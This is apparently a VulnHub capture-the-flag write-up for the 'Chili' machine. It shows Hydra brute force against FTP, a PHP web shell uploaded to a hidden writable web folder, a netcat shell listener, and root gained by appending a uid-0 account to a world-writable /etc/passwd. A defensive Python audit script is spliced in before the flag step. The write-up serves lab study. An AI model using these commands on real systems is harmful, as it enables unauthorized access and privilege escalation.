This post contains a lot of very useful knowledge; lab it yourself and record a video if you can…
Introduction
Summary
This one was a pretty tricky box that I enjoyed a lot! It is easy, but you have to think smart. We start by brute forcing FTP, which gives us access to all system files; we then look for a writeable directory under /var/www/html and place our shell there. Privilege escalation to root is easy: /etc/passwd is writeable. Let's pwn it!
Enumeration/Reconnaissance
Let’s start as always with nmap.
```
$ ip=192.168.1.13
$ nmap -p- --min-rate 10000 $ip
```
Port 80 has nothing interesting; I checked /robots.txt and tried directory brute force with gobuster using lots of wordlists, but nothing. Anyway, I checked the hint the maker provided on the VulnHub page: "If you ever get stuck, try again with the name of the lab".
Ahh, here we go, let's brute force FTP using the username chili (this takes some time).
```
$ hydra -l chili -P /usr/share/wordlists/rockyou.txt $ip ftp
[ftp] host: 192.168.1.13   login: chili   password: a1b2c3d4
```
Shell as www-data
Perfect, we can log in as chili:a1b2c3d4. I enumerated the system but there is no SSH, so the only solution left is to upload a shell under /var/www/html, but it isn't writable. There is, however, a hidden folder under /var/www/html that is writable:
```
$ ftp $ip
ftp> cd /var/www/html
ftp> ls -la
200
drwxr-xr-x    4 0        0            4096 Sep 08 13:12 .
drwxr-xr-x    3 0        0            4096 Sep 08 11:41 ..
drwxrwxrwx    2 0        0            4096 Sep 08 13:14 .nano   <-----
drwxr-xr-x    2 0        0            4096 Sep 08 13:12 .vim
-rw-r--r--    1 0        0           74290 Oct 23  2018 Chile_WEB.jpg
-rw-r--r--    1 0        0             657 Sep 08 11:44 index.html
226 Directory send OK.
ftp>
```
Let's upload a PHP web shell under .nano and make it executable.
```
ftp> cd .nano
ftp> put shell.php
ftp> chmod 007 shell.php
```
Now let's execute it and catch the shell.
```
$ curl http://$ip/.nano/shell.php
```
```
$ nc -lvp 5555
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@chili:/$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Shell as chili
We can use the same FTP password to privesc to user chili now.
```
www-data@chili:/$ su - chili
Password: a1b2c3d4
chili@chili:~$ whoami;id
chili
uid=1000(chili) gid=1000(chili) groups=1000(chili),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```
Shell as root
After some enumeration, I found that /etc/passwd is writable. Let's simply add a root user to it.
```
chili@chili:~$ ls -la /etc/passwd
-rw-r--rw- 1 root root 1450 Sep  8 12:23 /etc/passwd
```
Let’s generate a password:
```
$ openssl passwd -6 -salt xyz pwned
$6$xyz$5I4IoAWqNNcGCYvBCeIz0UZr5NoOPvvHrwR9B1AX7.1fYnHX3clTDW9YRVi3TYivXiJ8Mb8clrGt7.gTxZGXb1
```
Now we can add our user.
```
chili@chili:~$ echo 'pwned:$6$xyz$5I4IoAWqNNcGCYvBCeIz0UZr5NoOPvvHrwR9B1AX7.1fYnHX3clTDW9YRVi3TYivXiJ8Mb8clrGt7.gTxZGXb1:0:0::/root:/bin/bash' >> /etc/passwd
chili@chili:~$ su - pwned
Password: pwned
root@chili:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
```
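From the defender's side, the root step above leaves two things an audit can catch: a group- or world-writable /etc/passwd and a second uid-0 account that carries its own hash in the password field instead of an `x` pointing to /etc/shadow. The following is an added example (not from the writeup or the box) that checks both; the sample passwd content is constructed and reuses only the entry and file mode shown above.

```python
"""Added audit example: flag a writable /etc/passwd and rogue uid-0 entries."""
import stat
from typing import List

def passwd_findings(passwd_text: str, mode: int) -> List[str]:
    """Return findings for passwd content given its st_mode (as from os.stat)."""
    findings = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("passwd is group/world-writable (mode %o)" % stat.S_IMODE(mode))
    for lineno, line in enumerate(passwd_text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append("line %d: malformed entry (%d fields)" % (lineno, len(fields)))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        # A real hash here bypasses /etc/shadow entirely; only x, *, ! or empty are expected.
        if pw not in ("x", "*", "!", ""):
            findings.append("line %d: %s has a password hash in passwd instead of shadow" % (lineno, name))
        # Any uid-0 account other than root is an extra root login.
        if uid == "0" and name != "root":
            findings.append("line %d: %s is an extra uid-0 account" % (lineno, name))
    return findings

# Constructed sample: normal entries followed by the line the writeup appends.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
chili:x:1000:1000:chili,,,:/home/chili:/bin/bash
pwned:$6$xyz$5I4IoAWqNNcGCYvBCeIz0UZr5NoOPvvHrwR9B1AX7.1fYnHX3clTDW9YRVi3TYivXiJ8Mb8clrGt7.gTxZGXb1:0:0::/root:/bin/bash
"""
# The mode from the writeup's ls -la output: -rw-r--rw- is 0646 on a regular file.
SAMPLE_MODE = stat.S_IFREG | 0o646

def audit_live(path: str = "/etc/passwd") -> List[str]:
    """Run the same checks against the real passwd file on this host."""
    import os
    with open(path) as f:
        return passwd_findings(f.read(), os.stat(path).st_mode)

if __name__ == "__main__":
    for finding in passwd_findings(SAMPLE_PASSWD, SAMPLE_MODE):
        print(finding)
```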
Let's read the flag.
```
root@chili:~# cat proof.txt
Sun_CSR.Chili.af6d45da1f1181347b9e2139f23c6a5b
```